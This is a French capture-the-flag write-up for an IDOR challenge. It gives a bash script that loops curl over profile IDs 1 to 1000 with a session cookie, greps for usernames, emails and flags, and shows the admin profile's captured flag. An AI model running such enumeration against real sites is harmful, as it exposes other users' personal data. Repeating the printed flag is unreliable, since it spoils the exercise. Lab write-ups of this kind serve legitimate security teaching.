Insecure Direct Object Reference (IDOR)
Consignes
Aucune pour ce niveau
Réalisation
Sur le site, j'ai l'option de cliquer sur /register ce qui me permet de renseigner un nom de compte.
J'observe une fois connecté que l'URL contient mon numéro d'ID :
http://ctfdLink.com/profile/494
Je vais donc tester les ID un par un, mais à l'aide d'un script, je ne suis pas fou.
Donc voici mon script ìdor_scan.sh :
#!/bin/bash
URL="http://ctfd-0.int.ecole2600.com:47738/profile/"
COOKIE="session=eyJ1c2VyX2lkIjo0OTR9.aBvQQg.j43d6jKzVuVB8ZlTrHNuWBu4LWo"
for id in {1..1000}; do
echo "[*] Testing ID $id"
curl -s -b "$COOKIE" "$URL$id" | grep -Ei "Username|Email|Profile|Flag" && echo ">> ID $id found interesting"
doneCe code test tous les IDs de 1 à 1000 et me renvoit le résultat de chacun d'entre eux. Je peux donc observer parmis les id ne possédant pas de profile ces IDs qui ressortent :
[*] Testing ID 100
<h2>Profile of john.doe</h2>
>> ID 100 found interesting
[*] Testing ID ...
[*] Testing ID 250
<h2>Profile of admin</h2>
<p>Flag: 2600{9ECdeslrxlW5bI11amohHA}</p>
>> ID 250 found interestingNous pouvons donc observer ici le FLAG du challenge :
2600{9ECdeslrxlW5bI11amohHA}Last updated